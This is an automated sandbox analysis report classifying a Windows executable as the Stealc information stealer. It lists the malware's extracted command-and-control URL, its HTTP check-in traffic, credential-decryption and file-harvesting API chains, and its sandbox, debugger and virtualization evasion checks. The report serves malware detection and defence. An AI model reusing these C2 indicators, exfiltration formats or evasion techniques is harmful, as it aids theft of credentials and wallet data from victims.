Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1523789
MD5:44397c793b2976c5571c32b11842e395
SHA1:d268ccdfb8eceb1f3ed0ccbb05f31b759528c0b7
SHA256:004cb0e8c07cc1b3f0613d1148d353c359ceffb8e2b27da445ed0eb11456b282
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 44397C793B2976C5571C32B11842E395)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7492JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7492JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.380000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T03:10:59.743753+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.380000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.phpnVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/GVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpGVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0038C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00387240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00387240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00389AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00389AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00389B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00389B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00398EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00398EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_003938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00394910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0038DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0038E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0038ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00394570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0038BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0038F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00393EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_003816D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 42 35 34 43 38 38 37 34 37 33 36 32 35 36 39 38 33 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="hwid"84DB54C887473625698399------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build"doma------KJJJKFIIIJJJECAAEHDB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00384880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00384880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJKFIIIJJJECAAEHDBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 34 44 42 35 34 43 38 38 37 34 37 33 36 32 35 36 39 38 33 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 4a 45 43 41 41 45 48 44 42 2d 2d 0d 0a Data Ascii: ------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="hwid"84DB54C887473625698399------KJJJKFIIIJJJECAAEHDBContent-Disposition: form-data; name="build"doma------KJJJKFIIIJJJECAAEHDB--
                Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/.9
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/G
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%U
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php9U
                Source: file.exe, 00000000.00000002.1701295497.0000000000E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37O

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008138FB0_2_008138FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C38920_2_007C3892
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007439540_2_00743954
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074A9220_2_0074A922
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067C9BC0_2_0067C9BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074C1850_2_0074C185
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075134A0_2_0075134A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00748B290_2_00748B29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007454330_2_00745433
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074DC9C0_2_0074DC9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F4D7C0_2_006F4D7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082E54B0_2_0082E54B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069FE5B0_2_0069FE5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00741EC70_2_00741EC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067AF0B0_2_0067AF0B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063FFA50_2_0063FFA5
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 003845C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xspzzdod ZLIB complexity 0.99486077813708
                Source: file.exe, 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00399600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00393720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00393720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FWO3COK1.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1878016 > 1048576
                Source: file.exeStatic PE information: Raw size of xspzzdod is bigger than: 0x100000 < 0x1a4600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.380000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xspzzdod:EW;ngzkmgsa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xspzzdod:EW;ngzkmgsa:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00399860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cef4e should be: 0x1d781a
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xspzzdod
                Source: file.exeStatic PE information: section name: ngzkmgsa
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C807E push 20E1ED9Ah; mov dword ptr [esp], ebp0_2_007C8092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0078A872 push edi; mov dword ptr [esp], eax0_2_0078A8B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0039B035 push ecx; ret 0_2_0039B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D7068 push edx; mov dword ptr [esp], edi0_2_007D7088
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076702C push edx; mov dword ptr [esp], eax0_2_00767030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008008FB push 7C072055h; mov dword ptr [esp], eax0_2_0080092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00818007 push ebx; mov dword ptr [esp], eax0_2_00818027
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00818007 push esi; mov dword ptr [esp], ebx0_2_0081804B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00818007 push 2885C1B0h; mov dword ptr [esp], edx0_2_0081808C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00818007 push ebx; mov dword ptr [esp], edx0_2_0081809E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EB0DB push edx; mov dword ptr [esp], ebx0_2_007EB106
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EB0DB push 2714F75Fh; mov dword ptr [esp], ecx0_2_007EB129
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EB0DB push 546BD651h; mov dword ptr [esp], eax0_2_007EB133
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B58B1 push 6CF79A2Ch; mov dword ptr [esp], esi0_2_007B58C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811852 push edi; mov dword ptr [esp], 589A4EF5h0_2_00811896
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00811852 push 62948F00h; mov dword ptr [esp], esi0_2_008118D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF8AC push ebp; mov dword ptr [esp], 2FB32BF1h0_2_007BF8E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF8AC push 02BC5D5Ch; mov dword ptr [esp], edx0_2_007BF979
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0077C091 push 321B18F0h; mov dword ptr [esp], ecx0_2_0077C099
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3892 push eax; mov dword ptr [esp], 2BCF9900h0_2_007C38B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3892 push 7C763C73h; mov dword ptr [esp], ebp0_2_007C38EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00783979 push 110D8F5Eh; mov dword ptr [esp], ebp0_2_00783A23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00783979 push 29D6C462h; mov dword ptr [esp], ecx0_2_00783A4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00783979 push ecx; mov dword ptr [esp], edi0_2_00783A58
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push ebp; mov dword ptr [esp], eax0_2_0074399B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push edx; mov dword ptr [esp], ebx0_2_007439C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push 4BA50807h; mov dword ptr [esp], ebp0_2_00743A0B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push 16A98A62h; mov dword ptr [esp], ebp0_2_00743A59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push ebp; mov dword ptr [esp], ecx0_2_00743AC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push edi; mov dword ptr [esp], 5EEF0D9Ch0_2_00743B50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743954 push 7A8F7AD1h; mov dword ptr [esp], eax0_2_00743B79
                Source: file.exeStatic PE information: section name: xspzzdod entropy: 7.952856014840197

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00399860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13210
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A89B second address: 75A8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F701CDA8A66h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F701CDA8A6Ch 0x00000016 jmp 00007F701CDA8A79h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C1C second address: 759C22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759EBC second address: 759EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759EC2 second address: 759EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 je 00007F701CDC837Ch 0x0000000f jmp 00007F701CDC8382h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759EEF second address: 759EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
